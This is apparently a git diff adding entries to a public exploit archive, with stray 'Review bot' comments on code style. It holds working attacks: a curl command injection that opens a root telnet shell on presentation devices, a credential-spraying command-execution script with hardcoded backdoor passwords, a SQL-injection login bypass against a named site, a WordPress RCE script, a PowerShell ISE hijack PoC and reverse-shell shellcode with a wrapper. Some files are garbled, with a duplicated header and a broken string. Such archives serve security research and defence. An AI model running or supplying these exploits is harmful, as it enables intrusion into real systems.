diff --git a/exploits/hardware/webapps/46786.txt b/exploits/hardware/webapps/46786.txt new file mode 100644 index 000000000..8d73a26c7 --- /dev/null +++ b/exploits/hardware/webapps/46786.txt @@ -0,0 +1,40 @@ +## +# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection +# Date: 05/01/2019 +# Exploit Author: Jacob Baines +# Tested on: Crestron AM-100 1.6.0.2 +# CVE : CVE-2019-3929 +# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k +# Advisory: https://www.tenable.com/security/research/tra-2019-20 +# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c +# Affected Vendors/Device/Firmware: +# - Crestron AM-100 1.6.0.2 +# - Crestron AM-101 2.7.0.1 +# - Barco wePresent WiPG-1000P 2.3.0.10 +# - Barco wePresent WiPG-1600W before 2.4.1.19 +# - Extron ShareLink 200/250 2.0.3.4 +# - Teq AV IT WIPS710 1.1.0.7 +# - InFocus LiteShow3 1.0.16 +# - InFocus LiteShow4 2.0.0.7 +# - Optoma WPS-Pro 1.0.0.5 +# - Blackbox HD WPS 1.0.0.5 +# - SHARP PN-L703WA 1.4.2.3 +## + +The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device: + +curl --header "Content-Type: application/x-www-form-urlencoded" \ +--request POST \ +--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \ +--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi + +Example: + +albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi +root +albinolobster@ubuntu:~$ telnet 192.168.88.250 1271 +Trying 192.168.88.250... +Connected to 192.168.88.250. +Escape character is '^]'. + +~/boa/cgi-bin # \ No newline at end of file diff --git a/exploits/linux/remote/46792.py b/exploits/linux/remote/46792.py new file mode 100755 index 000000000..17187064c --- /dev/null 
+++ b/exploits/linux/remote/46792.py 
@@ -0,0 +1,102 @@ +# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution +# Google Dork: N/A +# Date: 02/05/2019 +# Exploit Author: Paolo Serracino +# Vendor Homepage: http://www.5vtechnologies.com +# Software Link: N/A +# Version: All +# Tested on: Embedded Linux OS +# CVE : N/A +# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated +# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one. +# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account. +# A list of these accounts is hardcoded in the script. + +#/usr/bin/python +import sys +import requests + + +def check_sw(target,port): + + res = requests.get(target + ':' + port) + + if '/cgi-bin/webctrl.cgi?action=index_page' in res.text: + return True + else: + print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR" + return False + +def check_login(target,port,command): + + if not check_sw(target,port): + sys.exit() + + creds_common = [('blueangel','blueangel'), #the "backdoor" account + ('root','abnareum10'), + ('root','Admin@tbroad'), + ('root','superuser'), + ('user','user') , + ('guest','guest'), + ] + + for i in range(len(creds_common)): + postdata=[('action','login_authentication'), + ('redirect_action','sysinfo_page'), + ('login_username',creds_common[i][0]), + ('login_password',creds_common[i][1]), + ('B1','Login') + ] + + res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata) + + if 'Set-Cookie' in res.headers: + cookie = res.headers.get('Set-Cookie') + print '[+] LOGGED IN WITH CREDENTIALS ' + str(creds_common[i][0] + ' : ' + creds_common[i][1]) + execute_cmd(target,port,cookie,command) + return True + + +def execute_cmd(target,port,cookie,cmd): + + print '[+] EXECUTING COMMAND' + new_headers = ({'User-Agent':'Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', + 'Referer': target, + 'Cookie': cookie + }) + res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers) + res_lines = res.text.splitlines() + result = [] + copy = False + + for line in res_lines: + + if 'round-trip min/avg/max' in line: + copy = True + elif '' in line: + copy = False + elif copy == True: + result.append(line) + + print('[+] COMMAND RESPONSE') + print('------------------------------------------') + + for r in result: + print r + print('------------------------------------------') + + +def main(): + + if len(sys.argv) < 4: + print '[-] 3 ARGS: TARGET PORT SHELL_COMMAND' + sys.exit() + + target = sys.argv[1] + port = sys.argv[2] + command = sys.argv[3] + if not check_login(target,port,command): + print '[-] COULD NOT FIND VALID CREDENTIALS' + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/46788.txt b/exploits/multiple/webapps/46788.txt new file mode 100644 index 000000000..b1d5ca9f0 --- /dev/null +++ b/exploits/multiple/webapps/46788.txt 
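Review bot: In execute_cmd the filter `elif '' in line:` is true for every line, so the line after the `round-trip min/avg/max` match immediately resets `copy` and the `elif copy == True:` branch is unreachable; `result` is therefore always empty and the COMMAND RESPONSE block prints nothing. Presumably a real sentinel was intended there (possibly a tag that did not survive rendering); if the empty string is genuinely intended, the branch is dead code and should go. Smaller points: `#/usr/bin/python` is missing the `!` so it is a comment rather than a shebang, the script is Python 2 only (print statements) and its header does not say so, and `for i in range(len(creds_common))` reads better as `for username, password in creds_common:`. check_login falls off the end with an implicit None when no credential pair works, which main relies on; an explicit `return False` after the loop would make that contract visible.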
@@ -0,0 +1,28 @@ +# Exploit Title: Zotonic <=0.46 mod_admin (Erlang) - Reflective Cross-Site Scripting +# Date: 24-04-2019 +# Exploit Author: Ramòn Janssen +# Researchers: Jan-martin Sijs, Joost Quist, Joost Vondeling, Ramòn Janssen +# Vendor Homepage: http://zotonic.com/ +# Software Link: https://github.com/zotonic/zotonic/releases/tag/0.46.0 +# Version: <=0.46 +# CVE : CVE-2019-11504 + +Attack type +Remote + +Impact +Code Execution + +Zotonic versions prior to 0.47 have multiple authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in the management module. The vulnerabilitie can be exploited when an authenticated user with administrative permissions visits the crafted URL (i.e. when phished or visits a website containing the URL). The XSS effects the following URLs and parameters of the management module: +- /admin/overview/ [qcat, qcustompivot, qs] +- /admin/users/ [qs] +- /admin/media/ [qcat,qcustompivot, qs] + +Example: https://[host]/admin/overview?qcustompivot="> + +Affected source code file zotonic_mod_admin: +- zotonic_mod_admin_identity\priv\templates\_admin_sort_header.tpl +- zotonic_mod_admin_identity\priv\templates\admin_users.tpl + +Reference(s) +http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel_0.47.0.html \ No newline at end of file diff --git a/exploits/php/webapps/46787.txt b/exploits/php/webapps/46787.txt new file mode 100644 index 000000000..52b26f4f0 --- /dev/null +++ b/exploits/php/webapps/46787.txt @@ -0,0 +1,12 @@ +# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass +# Date: 2019-05-01 +# Exploit Author: Veyselxan +# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4 + +# Tested on: Linux +https://eowynlab.cf/autobot-follow/index.php + + +username: admin' or '1'='1 + +Password: admin' or '1'='1 \ No newline at end of file 
diff --git a/exploits/php/webapps/46794.py b/exploits/php/webapps/46794.py new file mode 100755 index 000000000..cfded3195 --- /dev/null +++ b/exploits/php/webapps/46794.py 
@@ -0,0 +1,67 @@ +# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) +# Date: March, 2019 +# Researcher: Luka Sikic +# Exploit Author: hash3liZer +# Download Link: https://wordpress.org/plugins/social-warfare/ +# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM +# Github: https://github.com/hash3liZer/CVE-2019-9978 +# Version: <=3D 3.5.2 +# CVE: CVE-2019-9978 + +# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 ) +# Date: March, 2019 +# Researcher: Luka Sikic +# Exploit Author: hash3liZer +# Download Link: https://wordpress.org/plugins/social-warfare/ +# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM +# Github: https://github.com/hash3liZer/CVE-2019-9978 +# Version: <= 3.5.2 +# CVE: CVE-2019-9978 + +import sys +import requests +import re +import urlparse +import optparse + +class EXPLOIT: + + VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s" + + def __init__(self, _t, _p): + self.target = _t + self.payload = _p + + def engage(self): + uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload ) + r = requests.get( uri ) + if r.status_code == 500: + print "[*] Received Response From Server!" + rr = r.text + obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" )) + if obj: + resp = obj.groups()[0] + if resp: + print "[<] Received: " + print resp.replace( "lnbreak", "\n" ) + else: + sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") + else: + sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!") + else: + sys.exit( "[~] Unexpected Status Received!" 
) + +def main(): + parser = optparse.OptionParser( ) + + parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" ) + parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." ) + + (options, args) = parser.parse_args() + + print "[>] Sending Payload to System!" + exploit = EXPLOIT( options.target, options.payload ) + exploit.engage() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/dos/46793.txt b/exploits/windows/dos/46793.txt new file mode 100644 index 000000000..f86cdc980 --- /dev/null +++ b/exploits/windows/dos/46793.txt @@ -0,0 +1,32 @@ +#Vendor: Solarwinds +#Site Vendor: https://www.dameware.com/ +#Product: Dameware Mini Remote Control +#Version: 10.0 x64 +#Platform: Windows +#Tested on: Windows 7 SP1 x64 +#Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. +#The buffer size passed in on the machine name parameter is not checked +#Vector: pass buffer to the machine host name parameter + +#Author: Dino Barlattani dinbar78@gmail.com +#Link: http://www.binaryworld.it + +#CVE ID: CVE-2019-9017 + +#POC in VB Script + +option explicit +dim fold,exe,buf,i,wsh,fso,result +exe = "DWRCC.exe" +fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64 +#1\" +for i = 0 to 300 + buf = buf & "A" +next +set wsh = createobject("wscript.shell") +set fso = createobject("scripting.filesystemobject") +if fso.folderexists(fold) then + fold = fold & exe + fold = chr(34) & fold & chr(34) + result = wsh.run(fold & " -c: -h: -m:" & buf,0,true) +end if \ No newline at end of file diff --git a/exploits/windows/local/46790.txt b/exploits/windows/local/46790.txt new file mode 100644 index 000000000..84f4ef228 --- /dev/null +++ b/exploits/windows/local/46790.txt 
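Review bot: The header block appears twice, and the first copy carries quoted-printable residue from a mail transport (`<=3D3.5.2`, `=3DIwAR2xLSnan=` with a soft line break splitting the reference URL); only the second, clean copy should be kept. In EXPLOIT.engage, `rr = r.text` is assigned and never read, and the two identical `sys.exit("[<] Nothing Received ...")` branches collapse into one if the test is written as `if obj and obj.groups()[0]:`. The module is Python 2 only (`urlparse`, `optparse`, print statements) and the header does not say so; a one-line note would save readers a failed run under Python 3. The optparse defaults of `""` for both `--target` and `--payload-uri` mean a missing argument reaches `urlparse.urljoin("", ...)` and `requests.get` rather than a usage error.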
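Review bot: The literal assigned to `fold` is split across two added lines (`...Mini Remote Control 10.0 x64` and `#1\"`), and the hunk's +32 line count confirms the break is in the committed file; VBScript string literals cannot span lines, so the script as stored fails with a syntax error before reaching `wsh.run`. This is most likely a line wrap introduced when the submission was pasted and should be rejoined into one line. The header also misspells `#Dscription`.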
@@ -0,0 +1,155 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt +[+] ISR: ApparitionSec +[+] Zero Day Initiative Program + + +[Vendor] +www.microsoft.com + + +[Product] +Windows PowerShell ISE + +The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. +In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface. + + +[Vulnerability Type] +Filename Parsing Flaw Remote Code Execution 0day + + +[References] +ZDI-CAN-8005 + + +[Security Issue] +Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain +array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename +and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of +PowerShell ISE allowing potential unexpected remote code execution. + +In PowerShell brackets are used to access array elements. + +PS C:\> $a=1..10 +PS C:\> $a[4] +5 + +However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file. +That file must contain a single matching char value which is also found in our specially crafted filename. + +Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a +file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L". + +Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols. 
+PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application. + +These chars also get the job done: +"$" "_" "#" "^" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1 + +[Hello].ps1 will execute this instead =====> h.ps1 + +Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to +another PS file named -.ps1 and seems to treat it sort of like a meta-character. + +[pw3d].ps1 <===== expected to execute + +3.ps1 <===== actually executed + +This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code +in ISE that is expected to run. However, when the user debugs the script a different script gets executed. +Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss. + +User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. +Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and +yet ... still they get PWNED!. + +Tested successfully on Win7/10 + +Long live user interaction! lol... + + +[POC Video URL] +https://www.youtube.com/watch?v=T2I_-iUPaFw + + +[Exploit/POC] +After opening PS files in ISE, set the execution policy so can test without issues. +set-executionpolicy unrestricted -force + +PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd. + +set-executionpolicy unrestricted -force process +Choose 'R' to run once. + +Below Python script will create two .ps1 files to demonstrate the vulnerable condition. +Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it... + +BAM! other PS script executes!. 
+ + +#PowerShell ISE 0day Xploit +#ZDI-CAN-8005 +#ZDI CVSS: 7.0 +#hyp3rlinx +#ApparitionSec + + +fname1="[HelloWorldTutoria1].ps1" #Expected code to run is 'HelloWorld!' +fname2="1.ps1" #Actual code executed is calc.exe for Poc +evil_code="start calc.exe" #Edit to suit your needs. +c=0 +payload1='Write-Output "Hello World!"' +payload2=evil_code+"\n"+'Write-Output "Hello World!"' + +def mk_ps_hijack_script(): + global c + c+=1 + f=open(globals()["fname"+str(c)],"wb") + f.write(globals()["payload"+str(c)]) + f.close() + if c<2: + mk_ps_hijack_script() + + +if __name__=="__main__": + mk_ps_hijack_script() + print "PowerShell ISE Xploit 0day Files Created!" + print "Discovery by hyp3rlinx" + print "ZDI-CAN-8005" + + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +ZDI Case opened : 2019-02-06 +Case officially contracted to ZDI : 2019-02-20 + +Vendor Disclosure : 2019-03-01 +submitted to the vendor as ZDI-CAN-8005. + +April 25, 2019 : MSRC response (as per ZDI): "we've determined that this doesn't meet the bar for servicing via a security update. +we have opened a bug with the PowerShell team, and this is something they may address in a future release as a form of defense-in-depth." + +ZDI also indicated they too will close the case. +May 1, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b12346902..286762240 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6407,6 +6407,7 @@ id,file,description,date,author,type,platform,port
 46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux,
 46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows,
 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
+46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
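Review bot: mk_ps_hijack_script writes two files by recursing on the module-level counter `c` and resolving `globals()["fname"+str(c)]` at run time, which obscures what is a two-item loop and leaves the handle unclosed if `write` raises; `for name, payload in ((fname1, payload1), (fname2, payload2)):` with `with open(name, "wb") as f:` does the same with no global state. The snippet is Python 2 (print statements, a `str` written to a binary handle) and the advisory does not say which interpreter it targets. This is a style and documentation point only.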
@@ -10450,6 +10451,7 @@ id,file,description,date,author,type,platform,port
 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,
 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
+46790,exploits/windows/local/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17375,6 +17377,7 @@ id,file,description,date,author,type,platform,port
 46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows,
 46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php,
 46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000
+46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41217,3 +41220,7 @@ id,file,description,date,author,type,platform,port
 46784,exploits/linux/webapps/46784.txt,"CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting",2019-05-01,DKM,webapps,linux,
 46777,exploits/php/webapps/46777.txt,"Agent Tesla Botnet - Information Disclosure",2019-04-30,n4pst3r,webapps,php,
 46780,exploits/windows/webapps/46780.py,"Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution",2019-04-30,"Avinash Kumar Thapa",webapps,windows,
+46786,exploits/hardware/webapps/46786.txt,"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection",2019-05-03,"Jacob Baines",webapps,hardware,
+46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php,
+46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,
+46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 498f78e76..2082791b3 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -959,3 +959,5 @@ id,file,description,date,author,type,platform
 46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
 46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
+46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86
+46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/46789.txt b/shellcodes/linux_x86/46789.txt
new file mode 100644
index 000000000..1d4823549
--- /dev/null
+++ b/shellcodes/linux_x86/46789.txt
@@ -0,0 +1,242 @@ +# Exploit Title: Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper +# Google Dork: NA +# Date: 2019-05-01 +# Exploit Author: Dave Sully +# Vendor Homepage: +# Software Link: NA +# Version: NA +# Tested on: Ubuntu 16.04 +# CVE : NA + +####################################################################### +####################################################################### + +# This is the raw assembly + +####################################################################### +####################################################################### + +; Filename: reverse_shell.nasm +; Author: Dave Sully +; Website: http://suls.co.uk +; Purpose: Reverse shell in x86 assembly + +global _start + +section .text +_start: + + ; Clear everthing we are using + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + xor esi, esi + xor edi, edi + + ; Define structure for socket + ; push 0x0100007f ; Push IP to stack in reverse byte order ; need to revist the null bytes here (127.0.0.1) + ; We have a issue here in that the ip address 127.0.0.1 = 0x0100007f in hex which contains null bytes + ; Easiest way around this is to XOR the value with 0xffffffff + mov edi, 0xfeffff80 ; xor of 0x0100007f and 0xffffffff + xor edi, 0xffffffff + push edi + push word 0xb315 ; Push 5555 to the stack in reverse byte order 5555 in hex = 0x15b3 + push word 0x2 ; push 2 to the stack (AF-INET) + + ; Create socket + ; s = socket(AF_INET, SOCK_STREAM, 0) + mov ax, 0x167 ; Syscall 359 (socket) + mov bl, 0x2 ; AF-INET (2) + mov cl, 0x1 ; Sock stream (1) + ; dl should already be zero + int 0x80 ; call system interupt to create socket + xchg esi, eax ; socket file descriptor now stored in esi + + ; Connect socket + ; connect(s, (struct sockaddr *)&addr, sizeof(addr)); + mov ax, 0x16a ; Syscall 362 connect + mov ebx, esi ; Move socket file descriptor into ebx + mov ecx, esp ; Point ecx to the top of the stack which has our address structure on it + mov dl, 0x10 ; 
Size of structure (16) + int 0x80 ; call system interupt to create connect + + ; Dup input output and error file descriptors + ; dup2(s, 0); // Dup2 sycall = 63 + xor eax, eax ; Clear eax + mov ebx, esi ; move socket id to ebx + xor ecx, ecx ; Clear ecx + mov cl, 0x2 ; set ecx to 2 +loop: + mov al, 0x3f ; syscall 63 + int 0x80 ; call dup 2 + dec ecx ; decrease ecx by 1 + jns loop ; jump if not signed back to loop, this should cycle 2,1,0 + + ; Execute Shell + ; execve("/bin/sh",0 ,0); // Execve syscall = 11 + ; (const char *filename, char *const argv[], char *const envp[]); + xor eax,eax ; null eax + mov al, 0xb ; syscall 11 into eax + xor ebx, ebx ; zero ebx + push ebx ; push a null string to the stack to terminate our string + push 0x68732f2f ; hs// + push 0x6e69622f ; nib/ + mov ebx, esp ; point ebx at the stack + xor ecx, ecx ; clear ecx and edx as they are used in the syscall + xor edx, edx + int 0x80 + +section .data + +####################################################################### +####################################################################### + +### Compile and link as follows + +nasm -f elf32 -o reverse_shell.o reverse_shell.nasm +gcc -o reverse_shell reverse_shell.o + + +####################################################################### +####################################################################### + +### To configure IP and port use the following python3 wrapper script + +####################################################################### +####################################################################### + + +#!/usr/bin/env python3 +# File: wrapper.py +# Author: Dave Sully +# Reverse shell wrapper in python3 +# Usage: python3 wrapper.py 192.168.1.1 5000 + +import argparse +import socket +from struct import unpack + +print("\n*****************************************") +print("***** Reverse shell wrapper script ******") +print("*****************************************") + +# Grab command line args (ip and port) 
+parser = argparse.ArgumentParser() +parser.add_argument("ip") +parser.add_argument("port") +args = parser.parse_args() +# check port is in a valid range +if ((int(args.port) > 65535) or (int(args.port) < 256)): + print("\nPort number must be between 256 and 65535\n") + exit() + +# Xor Function +def xor_strings(str1,str2): + result = int(str1,16) ^ int(str2,16) + return '{:x}'.format(result) + +# Process IP address +print("\nIP address: "+ args.ip) +# Convert IP to Hex +hexip = socket.inet_aton(args.ip).hex() +print("Hex IP Address: "+hexip) +# Reverse the hex String +revhexip = hexip[6:8] +revhexip = revhexip + hexip[4:6] +revhexip = revhexip + hexip[2:4] +revhexip = revhexip + hexip[0:2] +# Xor the reversed hex address as the shellcode XORs this address to avoid null bytes +xored_ip = xor_strings(revhexip,"FFFFFFFF") +print("XORed reverse hex IP Address: "+ xored_ip) + +# Process Port +print("\nPort: "+args.port) +# Convert Port to hex +hexport = hex(int(args.port)).replace('0x','') +if len(hexport)<4: + hexport = '0'+hexport +print("Hex Port: "+hexport) +revhexport = hexport[2:4]+ hexport[0:2] +print("Reverse Hex Port: "+revhexport) + +# Check for null bytes +if (xored_ip[0:2]=="00" or + xored_ip[2:4]=="00" or + xored_ip[4:6]=="00" or + xored_ip[6:8]=="00" or + revhexport[0:2]=="00" or + revhexport[2:4]=="00"): + print("\n** WARNING ** Null Bytes detected in Xored IP or port shellcode,") + print("shellcode may not work !\n") + +# Construct Shellcode +shellcode= \ +"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x31\\xf6\\x31\\xff\\xbf" + \ + "\\x"+ xored_ip[6:8] + \ + "\\x"+ xored_ip[4:6] + \ + "\\x"+ xored_ip[2:4] + \ + "\\x"+ xored_ip[0:2] + \ +"\\x83\\xf7\\xff\\x57\\x66\\x68" + \ + "\\x"+ revhexport[2:4] + \ + "\\x"+ revhexport[0:2] + \ +"\\x66\\x6a\\x02\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x96\\x66" + \ +"\\xb8\\x6a\\x01\\x89\\xf3\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc0\\x89\\xf3" + \ 
+"\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\xb0\\x0b" + \ +"\\x31\\xdb\\x53\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3" + \ +"\\x31\\xc9\\x31\\xd2\\xcd\\x80" +# Output Shellcode +print("\nShellcode (Length 91 Bytes): \n") +print(shellcode+"\n") + +####################################################################### +####################################################################### + +# Example output + +***************************************** +***** Reverse shell wrapper script ****** +***************************************** + +IP address: 127.0.0.1 +Hex IP Address: 7f000001 +XORed reverse hex IP Address: feffff80 + +Port: 8080 +Hex Port: 1f90 +Reverse Hex Port: 901f + +Shellcode (Length 91 Bytes): + +\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x31\xf6\x31\xff\xbf\x80\xff\xff\xfe\x83\xf7\xff\x57\x66\x68\x1f\x90\x66\x6a\x02\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x96\x66\xb8\x6a\x01\x89\xf3\x89\xe1\xb2\x10\xcd\x80\x31\xc0\x89\xf3\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x31\xdb\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80 + + +####################################################################### +####################################################################### + +# To compile shellcode from the wrapper script use the following C program +# Replacing the shellcode with the wrapper script shellcode output + +####################################################################### +####################################################################### + +// Filename: shellcode.c +#include 